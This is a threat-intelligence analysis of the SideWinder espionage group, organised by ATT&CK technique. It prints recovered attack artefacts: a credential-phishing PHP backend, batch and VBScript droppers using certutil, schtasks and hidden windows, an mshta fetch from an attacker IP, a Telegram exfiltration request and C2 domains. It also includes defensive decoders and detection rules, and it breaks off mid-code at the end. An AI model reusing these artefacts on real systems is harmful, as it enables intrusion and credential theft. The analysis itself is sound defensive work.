Sıla Özeren Hacıoğlu | 17 MIN READ

LAST UPDATED ON DECEMBER 17, 2025

SideWinder Threat Group: Maritime and Nuclear Sectors at Risk with Updated Toolset

SideWinder is a long-running cyber-espionage group active since at least 2012, consistently refining its targeting and operational scale. Over the years, the group has expanded from focused regional intrusions to wide-ranging campaigns across Asia, Africa, and parts of Europe. Major events include its public naming in 2018, COVID-19–themed operations in 2020, expansive multi-country campaigns between 2021 and 2024, and the continued broadening of its geographic and sectoral focus, particularly toward government, military, financial, maritime, logistics, and nuclear-related entities.

SideWinder’s TTPs center on highly tailored spearphishing for initial access, using malicious files, links, and credential-harvesting pages. Execution typically relies on Windows scripting environments such as cmd.exe, VBA, VBScript, and mshta-based HTA delivery. Persistence is maintained through scheduled tasks and autostart scripts, while privilege escalation leverages UAC bypass techniques. The group employs extensive defense evasion techniques, including obfuscation, masquerading, artifact cleanup, and DLL side-loading, alongside robust credential-theft capabilities targeting RDP, Windows credential stores, and browser data. Its collection methods include harvesting documents, system information, and browser tokens, while C2 operations rely on rotating server lists, encrypted channels, and occasional web-service-based exfiltration.

In this post, we will review SideWinder’s major historical operations, highlight its expansive targeting across government, military, financial, and critical-infrastructure sectors, and examine the group’s tactics, techniques, and procedures to understand how it conducts methodical, multi-stage cyber-espionage campaigns. In the end, we will show how Picus helps defend against this group.


What Are the Major Activities of the SideWinder Group?

  • 2012 (at least) – The threat group begins activity, specializing in cyberespionage [1].

  • 12 April 2018 – Kaspersky publicly names the SideWinder APT group for the first time in an APT Trends summary [2].

  • 2020 – The group capitalizes on global events by launching campaigns utilizing a COVID-19 theme to lure victims, notably targeting Pakistani Government Officials [3].

  • June – November 2021 – SideWinder conducts a systematic and expansive campaign targeting over 60 entities across South and East Asia, including governments, military organizations, central banks, and media in Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka [1].

  • 2024 – The group broadens its geographic operations across numerous regions, including Africa, Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, the Philippines, Sri Lanka, the UAE, Vietnam, and global diplomatic entities, while shifting its sector focus toward maritime infrastructure, logistics companies, and nuclear power facilities in South Asia [4].

Which MITRE ATT&CK Techniques Are Used by SideWinder?

Tactic: Initial Access

T1204.002 User Execution: Malicious File

The attack chain is dependent on the victim running a malicious file. In some attack chains, a ZIP archive is delivered containing a malicious LNK (shortcut) file. Upon execution, this LNK file runs code to fetch the next-stage HTA payload from an attacker-controlled server [2].

T1566.001 Phishing: Spearphishing Attachment

The group's principal infiltration vector is spearphishing emails carrying malicious attachments. While RTF (Rich Text Format) files are common, other formats like DOCX, LNK, and ZIP files are also employed.

One observed example targeted Pakistani government offices with a malicious .docx file, using a lure related to police procedures [2].

From: SSP INT LCTD SINDH
Sent: 4/23/2019 6:14 AM
To: <Redacted>
Subject: Fwd: STANDING OPERATING PROCEDURES FOR POLICE EMERGENCY THREAT LEVELS AND COLOR CODES FOR OPERATIONAL READINESS.
Attachments: STANDING OPERATING PROCEDURES FOR POLICE EMERGENCY THREAT LEVELS AND COLOR CODES FOR OPERATIONAL READINESS.docx

T1566.002 Phishing: Spearphishing Link

Beyond attachments, the threat actor also utilizes spearphishing links to direct victims to malicious destinations. These links often lead to credential harvesting sites, which are sophisticated phishing pages impersonating legitimate login portals for services like the Zimbra web client, the Central Bank of Myanmar, and the Nucleus Vision crypto platform.

A backend login.php script is used to capture credentials. This script is configured to harvest the victim's username, password, IP address, access time, and User-Agent, inserting them into a MySQL database [1]. A significant attributional clue is the script's hardcoded timezone setting of Asia/kolkata, which is set before recording the access time.

<?php
// Backend of the credential-harvesting page (login.php) as recovered from the
// Central Bank of Myanmar and Nucleus Vision kits. Note the lowercase "kolkata"
// and that the captured values are interpolated straight into the query string.
date_default_timezone_set('Asia/kolkata');
$accesstime = date('d-m-Y H:i:s');

// SQL insertion logic from the Central Bank of Myanmar phish
$sql = "INSERT INTO target.dca_mm (username, password, ipaddress, accesstime, signature)
        VALUES ('$username', '$password', '$ip', '$accesstime', '$useragent')";

// SQL insertion logic from the Nucleus Vision crypto phish
$sql = "INSERT INTO vision.nucleus (username, password, ipaddress, accesstime, signature)
        VALUES ('$username', '$password', '$ip', '$accesstime', '$useragent')";
?>

Tactic: Execution

T1059.003 Command and Scripting Interpreter: Windows Command Shell

The Windows Command Shell (cmd.exe) is a fundamental component for orchestrating the infection. Malicious macros and HTA files frequently drop and execute batch scripts (often named a.bat). These scripts manage various actions, including creating persistence via scheduled tasks, running payloads, and cleaning up forensic evidence [1].

schtasks /create /SC minute /MO 2 /TN WindowSecurityPatch /TR "%APPDATA%\WindowsSecurity.exe" /F
timeout 3
del /f "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\invisible.vbs"

A more complex, multi-stage "dropper" script has also been observed. Its sole function is to use echo commands to write a series of other batch files (b.bat, c.bat, d.bat, e.bat) and VBScripts to the disk. This chain is responsible for downloading, decoding (using certutil), creating persistence (using schtasks), and finally deleting all operational artifacts [1].

echo off
REM a.bat: writes b.bat, c.bat, d.bat and e.bat with echo, hides the stagers, then hands off to b.bat
>>"%LOCALAPPDATA%\b.bat" (
echo echo off
echo wscript.exe "%LOCALAPPDATA%\downfile.vbs"
echo "%LOCALAPPDATA%\stealthex.vbs" "%LOCALAPPDATA%\c.bat"
)
>>"%LOCALAPPDATA%\c.bat" (
echo echo off
echo certutil /decode "%LOCALAPPDATA%\microsoft\cloudstatus.txt" "%LOCALAPPDATA%\cloudAP.exe"
echo "%LOCALAPPDATA%\stealthex.vbs" "%LOCALAPPDATA%\d.bat"
echo attrib +h "%LOCALAPPDATA%\cloudAP.exe"
)
>>"%LOCALAPPDATA%\d.bat" (
echo echo off
echo schtasks /create /SC minute /MO 10 /TN CloudAPIManager /TR "%LOCALAPPDATA%\cloudAP.exe" /F
echo "%LOCALAPPDATA%\stealthex.vbs" "%LOCALAPPDATA%\e.bat"
)
>>"%LOCALAPPDATA%\e.bat" (
echo del "%LOCALAPPDATA%\b.bat"
echo del "%LOCALAPPDATA%\c.bat"
echo del "%LOCALAPPDATA%\d.bat"
echo del "%LOCALAPPDATA%\microsoft\cloudstatus.txt"
echo del "%LOCALAPPDATA%\e.bat"
)
attrib +h "%LOCALAPPDATA%\a.bat"
attrib +h "%LOCALAPPDATA%\stealthex.vbs"
attrib +h "%LOCALAPPDATA%\downfile.vbs"
"%LOCALAPPDATA%\stealthex.vbs" "%LOCALAPPDATA%\b.bat"

T1059.005 Command and Scripting Interpreter: Visual Basic

VBA macros (like the "Gohra" macro) embedded in Office documents are used to decode and drop payloads. The payload (e.g., a ZIP file) is stored as a long, delimited string within a form element (UserForm1.TextBox1.Text). The macro reconstructs the malicious file by splitting this string by its delimiter (e.g., "-") and converting each part into a byte [1].

Dim btsGohra7(361128) As Byte
Dim arlGohra As Variant, vl As Variant
Dim linGohra As Long
' The payload is stored in the form as decimal byte values separated by "-"
arlGohra = Split(UserForm1.TextBox1.Text, "-")
For Each vl In arlGohra
    btsGohra7(linGohra) = CByte(vl)
    linGohra = linGohra + 1
Next
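Once the form text has been dumped (olevba prints UserForm control contents), the reconstruction step is easy to reproduce outside Office. The Python below is an added example written for this post, not code from the macro or from the cited reports; it re-implements the Split/CByte loop, rejects tokens that CByte would overflow on, and triages the result by magic bytes. The ZIP it packs and the form text it builds from it are constructed for the demo.

```python
import io
import zipfile


def encode_gohra(payload: bytes, delimiter: str = "-") -> str:
    """Pack bytes the way the macro stores them in UserForm1.TextBox1.Text:
    decimal byte values joined by a delimiter (helper built for this demo)."""
    return delimiter.join(str(b) for b in payload)


def decode_gohra(text: str, delimiter: str = "-") -> bytes:
    """Reverse the macro loop: Split(text, "-") then CByte() on every token.
    CByte overflows on anything outside 0..255, so such tokens abort decoding."""
    out = bytearray()
    for tok in text.strip().split(delimiter):
        if tok == "":
            continue  # tolerate a trailing delimiter
        value = int(tok)
        if not 0 <= value <= 255:
            raise ValueError(f"token {tok!r} is not a byte value")
        out.append(value)
    return bytes(out)


def classify_payload(data: bytes) -> str:
    """Cheap triage of the reconstructed blob by its leading bytes."""
    if data[:2] == b"PK":
        return "zip"
    if data[:2] == b"MZ":
        return "pe"
    if data[:5] == b"{\\rtf":
        return "rtf"
    return "unknown"


def list_zip_members(data: bytes) -> list[str]:
    """Member names of a reconstructed ZIP (e.g. the dropped WindowsSecurity.exe)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


# Constructed sample: a tiny ZIP holding a fake dropper, packed like the macro's form field.
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w", zipfile.ZIP_DEFLATED) as _zf:
    _zf.writestr("WindowsSecurity.exe", b"MZ" + b"\x00" * 62)
SAMPLE_ZIP = _buf.getvalue()
SAMPLE_FORM_TEXT = encode_gohra(SAMPLE_ZIP)

if __name__ == "__main__":
    blob = decode_gohra(SAMPLE_FORM_TEXT)
    print(classify_payload(blob), list_zip_members(blob))
```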

VBScript files, often executed by the batch scripts, serve as stealthy launchers and persistence mechanisms.

This script launches two other scripts, invisible2.vbs and a.bat, in hidden windows (argument 0) [1].

CreateObject("Wscript.Shell").Run "%APPDATA%\invisible2.vbs", 0, False
' new:{CLSID} instantiates WScript.Shell by CLSID instead of its ProgID
GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B").Run "%APPDATA%\a.bat", 0, False

This script's function is to extract the contents of the WindowsSecurity.zip archive using the Shell Application COM object [1].

' new:{CLSID} instantiates Shell.Application by CLSID instead of its ProgID
Set oApp = GetObject("new:13709620-C279-11CE-A49E-444553540000")
oApp.Namespace("%APPDATA%").CopyHere oApp.Namespace("%APPDATA%\WindowsSecurity.zip").items

This script is used for persistence. It is placed in the Startup folder, sleeps for 5 minutes (300000 milliseconds), and then launches the main batch script (a.bat) in a hidden window [1].

WScript.Sleep 300000
CreateObject("Wscript.Shell").Run Chr(34) & "%APPDATA%\Local\\a.bat" & Chr(34), 0, False

A generic runner script that executes its first command-line argument (WScript.Arguments(0)) in a hidden window [1].

CreateObject("Wscript.Shell").Run Chr(34) & WScript.Arguments(0) & Chr(34), 0, False

T1106 Native API

The malware employs direct Windows API calls to execute shellcode. For instance, one stager allocates a new memory buffer using VirtualAlloc, copies its shellcode into this buffer, and then passes execution to it by calling CreateThread [1].

T1203 Exploitation for Client Execution

The group is known to exploit CVE-2017-11882, a memory corruption vulnerability in the Microsoft Office Equation Editor. This flaw is used to gain code execution from malicious RTF files [2].

T1218.005 System Binary Proxy Execution: Mshta

A core execution technique involves using mshta.exe, a legitimate and signed Microsoft utility. This binary is used to download and run remote HTA (HTML Application) files or JavaScript [1]. This action is typically initiated when a user clicks a malicious LNK file or via shellcode from an RTF exploit.

Link Target: C:\Windows\System32\mshta.exe
Command Line Arguments: http://185[.]163[.]47[.]226/$/nepal/npa.hta

Tactic: Persistence

T1053.005 Scheduled Task/Job: Scheduled Task

The primary persistence mechanism on Windows is the use of Scheduled Tasks. Batch scripts run during infection leverage schtasks.exe to create new tasks. These tasks are configured to re-execute the main payload at frequent intervals, such as every 2 or 10 minutes, or daily at a set time [1].

REM Runs every 2 minutes, named WindowSecurityPatch
schtasks /create /SC minute /MO 2 /TN WindowSecurityPatch /TR "%APPDATA%\WindowsSecurity.exe" /F

REM Runs every 10 minutes, named CloudAPIManager
schtasks /create /SC minute /MO 10 /TN CloudAPIManager /TR "%LOCALAPPDATA%\cloudAP.exe" /F

REM Runs daily at 11:00, named WindowsUpdate
schtasks /create /sc daily /tn WindowsUpdate /tr %tmp%/WindowsUpdate.exe /st 11:00 /f

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

In some infection chains, the invisible.vbs script is dropped into the user's Startup folder [1]. This ensures the script is automatically run every time the user logs in; the batch cleanup step shown under T1059.003 later deletes it from that folder once the scheduled task is in place.

Tactic: Privilege Escalation

T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control

The malware attempts to bypass User Account Control (UAC) using techniques selected based on the security products installed on the system. The default method abuses the CMSTP (Windows Connection Manager Profile Installer) program. This technique involves passing a custom profile to the legitimate CMSTP executable to run arbitrary commands with elevated privileges.

This default bypass is used unless Kaspersky or 360 Total Security products are detected. If those security solutions are present, the malware switches to a different UAC bypass that abuses the "IElevatedFactoryServer" COM object. In this scenario, shellcode is injected into explorer.exe. This shellcode loads a malicious library (from a resource named "COMUacBypass"), which uses the COM object to register a new, high-privilege Windows task. This task is then used to run the payload with elevated permissions [5].

Tactic: Defense Evasion

T1027 Obfuscated Files or Information

To hinder static analysis, some payloads (like SideWinder.ReverseShell.e, and the Chisel tool) are packed using UPX [1].

T1036.004 Masquerading: Masquerade Task or Service

Persistence-related scheduled tasks are given common, system-related names to appear legitimate, such as WindowSecurityPatch, CloudAPIManager, WindowsUpdate, and WindowHost.

T1036.005 Masquerading: Match Legitimate Resource Name or Location

Payloads are given names like WindowsSecurity.exe to mimic benign Windows components.

T1036.007 Masquerading: Double File Extension

Malicious LNK files are disguised using double file extensions, such as .pdf.lnk or .doc.lnk, to trick users into believing they are simple documents.

T1070.004 Indicator Removal: File Deletion

The multi-stage batch scripts are designed for self-cleanup. For example, the final e.bat script in one chain is tasked with deleting all previous batch scripts (b.bat, c.bat, d.bat) and the downloaded encoded payload (cloudstatus.txt) after the final executable is active and persisted.

T1140 Deobfuscate/Decode Files or Information

The group employs several methods to decode payloads on the victim's machine. The legitimate Windows utility certutil.exe is used to Base64-decode payloads downloaded to disk (e.g., hello.txt, cloudstatus.txt) [1].

cmd.exe /c certutil -decode %tmp%/hello.txt %tmp%/scvhost.exe & %tmp%/scvhost.exe

certutil /decode "%LOCALAPPDATA%\microsoft\cloudstatus.txt" "%LOCALAPPDATA%\cloudAP.exe"

Various custom XOR schemes are also used [1], [5]:

  • C2 traffic for one RAT is encrypted with a 3-byte XOR key: "NPA". 
  • The "StealerBot" implant is decrypted using its first 32 bytes as a rolling XOR key.
  • Shellcode from the RTF exploit decrypts a JavaScript payload using a static 0x12 XOR key.

T1564.001 Hide Artifacts: Hidden Files and Directories

Malicious files and directories are hidden. One HTA downloader creates the %userprofile%\windowshost directory with both "hidden" and "system" attributes. The batch scripts also use the attrib +h command to hide payloads and themselves from user view [1].
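Almost every step described under Execution, Persistence, Privilege Escalation and Defense Evasion above leaves process-creation telemetry (Sysmon Event ID 1 or Security Event 4688). The Python below is an added example, not Picus or vendor code, that encodes those observations as rules over a minimal event projection: certutil decode or urlcache, short-interval schtasks with masquerading names or actions in user-writable paths, mshta with a URL, cmstp loading an .inf from a user-writable path, script hosts running a .vbs from %APPDATA% or %LOCALAPPDATA%, attrib +h, and an Office process spawning a script host. The ProcEvent field names, the sample events and the 203.0.113.10 address are constructed; real logs need mapping into ProcEvent first.

```python
import re
from dataclasses import dataclass

# Paths an unprivileged user can write to; the chains above stage everything under
# %APPDATA%, %LOCALAPPDATA% or %TMP%. Both expanded and literal forms are matched.
USER_WRITABLE = re.compile(
    r"\\AppData\\(Roaming|Local)\\|\\Temp\\|%(APPDATA|LOCALAPPDATA|TEMP|TMP)%", re.I)
MASQ_TASK_NAMES = {"windowsecuritypatch", "cloudapimanager", "windowsupdate", "windowhost"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}


@dataclass
class ProcEvent:
    """Minimal projection of a Sysmon Event ID 1 / Security 4688 record (constructed schema)."""
    image: str
    command_line: str
    parent_image: str = ""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _task_name(cmd: str) -> str:
    m = re.search(r'/tn\s+"?([^\s"]+)', cmd, re.I)
    return m.group(1).lower() if m else ""


def _minute_interval(cmd: str):
    m = re.search(r"/sc\s+minute\s+/mo\s+(\d+)", cmd, re.I)
    return int(m.group(1)) if m else None


def detect(ev: ProcEvent) -> list[tuple[str, str]]:
    """Return (ATT&CK technique, reason) pairs that fire on one process-creation event."""
    img, cmd, parent = _basename(ev.image), ev.command_line, _basename(ev.parent_image)
    hits = []
    if parent in OFFICE_PARENTS and img in SCRIPT_HOSTS:
        hits.append(("T1204.002", f"{parent} spawned {img}"))
    if img == "certutil.exe" and re.search(r"(?:^|\s)[-/]?(decode|urlcache)\b", cmd, re.I):
        hits.append(("T1140", "certutil used to decode or fetch a payload"))
    if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        interval = _minute_interval(cmd)
        if interval is not None and interval <= 10:
            hits.append(("T1053.005", f"task re-runs every {interval} minute(s)"))
        if USER_WRITABLE.search(cmd):
            hits.append(("T1053.005", "task action lives in a user-writable directory"))
        if _task_name(cmd) in MASQ_TASK_NAMES:
            hits.append(("T1036.004", f"task name mimics a Windows component: {_task_name(cmd)}"))
    if img == "mshta.exe" and re.search(r"https?://", cmd, re.I):
        hits.append(("T1218.005", "mshta fetching a remote HTA"))
    if img == "cmstp.exe" and re.search(r"\.inf\b", cmd, re.I) and USER_WRITABLE.search(cmd):
        hits.append(("T1548.002", "cmstp loading a profile from a user-writable path"))
    if img in {"wscript.exe", "cscript.exe"} and re.search(r"\.vbs\b", cmd, re.I) and USER_WRITABLE.search(cmd):
        hits.append(("T1059.005", "script host running a VBScript from a user-writable path"))
    if img == "attrib.exe" and re.search(r"(?:^|\s)\+h\b", cmd, re.I):
        hits.append(("T1564.001", "attrib +h hiding a file"))
    return hits


def scan(events):
    """Run detect() over a batch; returns [(event index, technique, reason), ...]."""
    return [(i, t, why) for i, ev in enumerate(events) for t, why in detect(ev)]


# Constructed sample telemetry modelled on the chains described above (not real logs).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\alice\AppData\Roaming\a.bat"',
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /SC minute /MO 2 /TN WindowSecurityPatch '
              r'/TR "C:\Users\alice\AppData\Roaming\WindowsSecurity.exe" /F',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r'certutil /decode "C:\Users\alice\AppData\Local\microsoft\cloudstatus.txt" '
              r'"C:\Users\alice\AppData\Local\cloudAP.exe"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://203.0.113.10/$/nepal/npa.hta",  # documentation IP, not an IOC
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",  # benign admin task: should stay quiet
              r'schtasks /create /SC daily /TN NightlyBackup /TR "C:\Program Files\Backup\run.exe" /ST 02:00',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe",  # benign use: should stay quiet
              r"certutil -hashfile C:\installers\setup.msi SHA256",
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, technique, reason in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {technique}: {reason}")
```

The interval threshold and path regex are the tunable parts: a two- or ten-minute re-run from a profile directory is rare for legitimate software, whereas schtasks itself is not.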

T1574.001 Hijack Execution Flow: DLL

DLL side-loading is a key technique for both execution and evasion. An HTA script first copies a legitimate, signed executable (e.g., rekeywiz.exe) to a new directory. It then drops a malicious loader DLL into the same directory but renames it to match a legitimate DLL that the executable tries to load (e.g., Duser.dll).

A configuration file (rekeywiz.exe.config) is also dropped to prevent .NET versioning issues. When the legitimate rekeywiz.exe is run, the Windows loader finds and loads the malicious Duser.dll first. This loader DLL then reads, decrypts, and loads the final implant (e.g., MpyutHk.tmp) from disk into memory.

The rekeywiz.exe.config file forces the legitimate executable to use .NET runtimes compatible with the malicious DLL:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup useLegacyV2RuntimeActivationPolicy="true">
<supportedRuntime version="v2.0.50727"/>
<supportedRuntime version="v4.0"/>
</startup>
</configuration>

This code shows the loader reading the encrypted implant, using the first 32 bytes as a rolling XOR key, and loading the decrypted assembly [2].

static Program()
{
    // Read the encrypted implant file (e.g., "MpyutHk.tmp")
    byte[] assemblyData = Program.GetAssemblyData("MpyutHk.tmp");

    // Payload buffer: total size minus the 32-byte key prefix
    byte[] array = new byte[assemblyData.Length - 32];

    // Copy the encrypted payload (offset 32 onward) into the new array
    Program.BufferCopy_1(ref assemblyData, 32, ref array, array.Length);

    // Decrypt each byte with the 32-byte key, cycling through it (rolling XOR)
    for (int i = 0; i < array.Length; i++)
    {
        byte[] array2 = array;
        int num = i;
        array2[num] ^= assemblyData[i % 32];
    }

    // Load the decrypted payload (a .NET assembly) into memory
    Program._assembly = Program.LoadAssembly(array);
}

Tactic: Credential Access

T1056.004 Input Capture: Credential API Hooking

The "StealerBot" implant includes an advanced RDP credential stealer. It monitors for the mstsc.exe (RDP client) process. When launched, shellcode is injected into the process. This shellcode loads a malicious C++ library that uses the Microsoft Detours package to hook three functions within SspiCli.dll:

  • SspiPrepareForCredRead (to get the server name)
  • CryptProtectMemory (to get the cleartext password)
  • CredIsMarshaledCredentialW (to get the username)

Stolen credentials are sent back to the main implant via a named pipe: c63hh148d7c9437caa0f5850256ad32c [5].

Another StealerBot module targets Windows credentials. It injects shellcode into explorer.exe, loading credsphisher.dll. This DLL calls the CredUIPromptForWindowsCredentialsW API, which displays a legitimate-looking native Windows prompt. It validates the entered credentials using LogonUserW. If valid, they are exfiltrated via a named pipe (a21hg56ue2c2365cba1g9840256ad31c). If invalid, the prompt is shown again in a loop until correct credentials are provided [5].

T1539 Steal Web Session Cookie

A .NET "StealerBot Token Grabber" module is designed to steal cookies and authentication tokens from high-value services like Facebook, LinkedIn, and Google (Gmail, Google Drive). It achieves this by dropping its own legitimate dependencies (e.g., Newtonsoft.Json.dll, System.Data.SQLite.dll) to parse the browser's cookie database and exfiltrate the tokens [5].

T1555.003 Credentials from Password Stores: Credentials from Web Browsers

A C# tool, originally named ChromeRecovery.exe, is used to extract authentication data from a wide variety of web browsers, including "Chrome", "Opera", "Yandex", "Brave Browser", "Vivaldi", and "Edge Chromium". The collected data (URL, username, password, and application) is saved to %TEMP%\windowslogs.txt [1].

Tactic: Discovery

T1016 System Network Configuration Discovery

A Python-based stealer (SideWinder.StealerPy) gathers the victim's local and external IP addresses. The external IP is identified by making a request to the public service http://ip.42.pl/raw [1].

T1083 File and Directory Discovery

One stealer variant searches the user's Desktop, Downloads, and Documents folders for files with specific extensions: .txt, .docx, .pdf, .xlsx, .pptx, .snt, .jpg, and .png. It also obtains a full list of all files and directories on the Desktop.

Tactic: Collection

T1005 Data from Local System

Malware is programmed to collect files from the local system. The SideWinder.StealerPy not only collects documents but also reads the first 200 characters of .txt files, likely for quick data triage [1].

The "StealerBot" implant gathers extensive system information using WMI queries and formats it into a JSON file for exfiltration. Collected data includes user accounts, computer system details (model, manufacturer, RAM), installed antivirus products, running processes, and detailed network interface information [2].

jsonWriter.WritePropertyName("sysInfo");
jsonWriter.WriteStartObject();

jsonWriter.WritePropertyName("userAccount");
SysInfo.WriteWmi(jsonWriter, "Win32_userAccount", @"root\cimv2", new string[] { "name" });

jsonWriter.WritePropertyName("computerSystem");
SysInfo.WriteWmi(jsonWriter, "Win32_computerSystem", @"root\cimv2",
    new string[] { "Caption", "UserName", "Manufacturer", "Model", "PrimaryOwnerName", "TotalPhysicalMemory" });

jsonWriter.WritePropertyName("antiVirusProduct");
SysInfo.WriteWmi(jsonWriter, "antiVirusProduct", @"root\SecurityCenter2",
    new string[] { "displayName", "ProductState", "TimeStamp" });

jsonWriter.WritePropertyName("process");
SysInfo.WriteWmi(jsonWriter, "Win32_process", @"root\cimv2", new string[] { "Name", "CommandLine", "ProcessOwner" });

jsonWriter.WritePropertyName("network");
// ... loops through NetworkInterface.GetAllNetworkInterfaces()
// to collect MAC, IP, Type, Speed, IsDhcpEnabled, etc.

Tactic: Command and Control

T1008 Fallback Channels

One of the RATs contains a hardcoded list of C2 server addresses. It randomly selects a server from this list upon execution. If the connection fails, it iterates to the next server, providing resilience against C2 takedowns [1].

C2 Server List
http://microsoft-patches[.]servehttp[.]com/
http://webmail[.]gavaf[.]org/
http://webmail-org[.]servehttp[.]com/
http://outlook[.]gavaf[.]org/
http://mail[.]gavaf[.]org/
http://srilankanairlines[.]redirectme[.]net/
http://expolanka[.]serveftp[.]com/
http://lankabelltd[.]myftp[.]org/
http://sltelecom[.]servehttp[.]com/
http://sltmobitel[.]hopto[.]org/
http://bankofceylon[.]sytes[.]net/
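Every host in the list above except the gavaf[.]org names sits under a dynamic-DNS provider and carries a label imitating a Sri Lankan bank, telecom or airline, or a Microsoft service. The Python below is an added example (not part of the original post) that turns that observation into a DNS-log triage: it parses dnsmasq-style query lines, isolates the registrant-chosen label under a known dynamic-DNS suffix, and raises the severity when that label contains a brand-like word. The suffix list, keyword list, log format and log lines are constructed for the example; registered lookalike domains such as gavaf[.]org need other signals (registration age, certificate history) and are deliberately not caught here.

```python
import re

# Dynamic-DNS providers seen in the list above, by registrable suffix (constructed list).
DYNDNS_SUFFIXES = ("servehttp.com", "redirectme.net", "serveftp.com", "myftp.org",
                   "hopto.org", "sytes.net", "no-ip.org", "ddns.net")
# Brand or infrastructure words the group has spliced into its host labels.
LOOKALIKE_WORDS = ("microsoft", "winupdate", "patch", "webmail", "outlook", "mail",
                   "airlines", "bank", "telecom", "mobitel")

# "<timestamp> <client> query[A] <qname>" lines (constructed dnsmasq-like format).
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\[A\]\s+(?P<qname>\S+)$")


def split_dyndns(qname: str):
    """Return (registrant label, provider suffix) for a dynamic-DNS name, else None."""
    name = qname.rstrip(".").lower()
    for suffix in DYNDNS_SUFFIXES:
        if name.endswith("." + suffix):
            labels = name[: -len(suffix) - 1].split(".")
            return labels[-1], suffix  # the label directly under the provider
    return None


def score(qname: str) -> list[str]:
    """Reasons a name matches the group's C2 naming pattern (empty list = none)."""
    reasons = []
    parts = split_dyndns(qname)
    if parts is None:
        return reasons
    label, suffix = parts
    reasons.append(f"dynamic DNS provider {suffix}")
    words = [w for w in LOOKALIKE_WORDS if w in label]
    if words:
        reasons.append(f"brand-like label {label!r} ({', '.join(words)})")
    return reasons


def triage(log_lines):
    """Return [(client, qname, severity, reasons)] for names worth a look."""
    flagged = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        reasons = score(m["qname"])
        if reasons:
            severity = "high" if len(reasons) > 1 else "low"
            flagged.append((m["client"], m["qname"], severity, reasons))
    return flagged


# Constructed log lines: names from the C2 list above plus two benign lookups; clients are TEST-NET.
SAMPLE_LOG = """
2025-11-16T08:01:02Z 192.0.2.10 query[A] microsoft-patches.servehttp.com
2025-11-16T08:01:05Z 192.0.2.10 query[A] login.microsoftonline.com
2025-11-16T08:02:11Z 192.0.2.23 query[A] bankofceylon.sytes.net
2025-11-16T08:02:40Z 192.0.2.23 query[A] home-cam.hopto.org
2025-11-16T08:03:01Z 192.0.2.23 query[A] webmail.gavaf.org
""".strip().splitlines()

if __name__ == "__main__":
    for client, qname, severity, reasons in triage(SAMPLE_LOG):
        print(f"{severity:4} {client} {qname}: {'; '.join(reasons)}")
```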

T1102 Web Service

One RAT variant uses the Telegram Bot API for exfiltration, sending a GET request with Base64-encoded data [1].

GET https://api[.]telegram[.]org/bot[token]/sendMessage?chat_id=[id]&text=[base64_data]

T1572 Protocol Tunneling

The Chisel tool, a Go-based utility for network traffic tunneling, has been utilized. The PE32 executable, packed with UPX, was observed connecting to a hardcoded server (microsoft-winupdate[.]servehttp[.]com:8443) and listening on local port 45689 for inbound connections [1].

T1573.001 Encrypted Channel: Symmetric Cryptography

C2 communications are not sent in clear text. One RAT uses a custom, multi-layer obfuscation scheme designed to evade network signatures. The data is first Base64 encoded, then XOR-encrypted with the 3-byte key "NPA", and finally Base64 encoded two more times [1].
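The three XOR schemes listed under T1140, the rolling-key loop in the Duser.dll loader, and the multi-layer C2 framing described here all reduce to one primitive. The Python below is an added example, not code from the implants or from the cited reports, that implements each as a decoder, with the matching encoder where one is needed to build test material: the base64, XOR "NPA", base64, base64 C2 framing; the StealerBot rolling XOR keyed by the first 32 bytes of the file; and the static 0x12 mask on the RTF-exploit JavaScript stage. The sample beacon, key and implant bytes are constructed.

```python
import base64


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data against key, cycling the key (the primitive all three schemes share)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Scheme 1: RAT C2 framing. Outbound: base64 -> XOR "NPA" -> base64 -> base64.
C2_KEY = b"NPA"


def c2_encode(plaintext: bytes) -> bytes:
    inner = base64.b64encode(plaintext)                 # layer 1
    masked = xor_repeating(inner, C2_KEY)               # XOR runs over the base64 text
    return base64.b64encode(base64.b64encode(masked))   # layers 2 and 3


def c2_decode(wire: bytes) -> bytes:
    masked = base64.b64decode(base64.b64decode(wire))   # strip layers 3 and 2
    return base64.b64decode(xor_repeating(masked, C2_KEY))


# Scheme 2: StealerBot implant file. bytes[0:32] are the key, bytes[32:] the encrypted assembly.
def stealerbot_decrypt(blob: bytes) -> bytes:
    if len(blob) <= 32:
        raise ValueError("blob is not longer than the 32-byte key prefix")
    return xor_repeating(blob[32:], blob[:32])


def stealerbot_encrypt(payload: bytes, key: bytes) -> bytes:
    """Inverse of the loader routine; used here only to build test material."""
    if len(key) != 32:
        raise ValueError("key must be exactly 32 bytes")
    return key + xor_repeating(payload, key)


# Scheme 3: the RTF exploit shellcode masks its embedded JavaScript with one static byte.
RTF_KEY = b"\x12"


def rtf_stage_decode(buf: bytes) -> bytes:
    return xor_repeating(buf, RTF_KEY)


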